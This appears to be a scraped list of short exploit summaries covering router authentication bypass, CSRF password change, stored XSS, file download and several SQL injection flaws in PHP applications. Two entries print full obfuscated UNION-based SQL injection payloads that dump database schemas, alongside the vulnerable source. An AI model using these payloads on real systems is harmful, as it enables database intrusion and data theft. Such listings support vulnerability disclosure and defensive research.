A specially crafted .m3u file containing a buffer of 550000 'A' characters can be imported into the MP4 Converter, causing a denial of service (DoS) condition.
This exploit allows an attacker to bypass authentication and execute arbitrary commands on the AirMaster 3000M router. The exploit uses a special cookie to bypass authentication and then uses a command injection vulnerability to execute arbitrary commands.
This exploit allows an attacker to change the admin password of RealTime RWR-3G-100 Router by sending a malicious request to the router. The malicious request is sent using a form with the username and password fields. The form is submitted to the router's IP address with the action set to 'goform/formPasswordSetup'. The attacker can then set the new password to whatever they want.
The vulnerability allows an attacker to inject sql commands.... Vulnerable Source: $id = $_GET["id"]; $statement = $connection->query("SELECT * FROM post WHERE id='$id'"); Proof of Concept: http://localhost/[PATH]/blog-details.php?id=[SQL] -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,0x283229,0x3c7370616e3e496873616e2053656e63616e3c2f7370616e3e,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529,0x283629)--+-
The vulnerability allows an attacker to inject sql commands into the 'id' parameter of the 'page.php' and 'abstract.php' scripts. Proof of Concept code is provided.
The vulnerability allows an technician users to inject sql commands. Vulnerable Source: $customer = getCustomer($_GET['id']); ?> $ddaa = $pdo->query("SELECT * FROM vehicle WHERE customer='".$_GET['id']."' order by id desc"); Proof of Concept: http://localhost/[PATH]/vehicleadd.php?id=[SQL] -2'++UNION(SELECT+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129)--+- http://localhost/[PATH]/customerpage.php?id=[SQL] http://localhost/[PATH]/fileadd.php?id=[SQL] http://localhost/[PATH]/email.php?id=[SQL] Etc...
A remote attacker can gain unauthenticated access to the Base Monitor, resulting in the ability to execute arbitrary SQL commands on any monitored Microsoft SQL Server machines. If the Base Monitor is connecting to these machines using an account with SQL admin privileges, then code execution on the operating system can result in full system compromise (if Microsoft SQL Server is running with local administrator privileges).
This vulnerability allows an attacker to inject malicious JavaScript code into the User Tag plugin of Piwigo. This code is stored in the server's database and is executed every time a visitor visits the photo page. The code is also executed in the admin's dashboard when they visit the keyword page.
The vulnerability allows an attacker to inject sql commands into vulnerable parameters in the web application. Proof of Concept examples are provided in the text.
The security obligation allows an attacker to arbitrary download files. Proof of Concept: http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE]
Services By CQR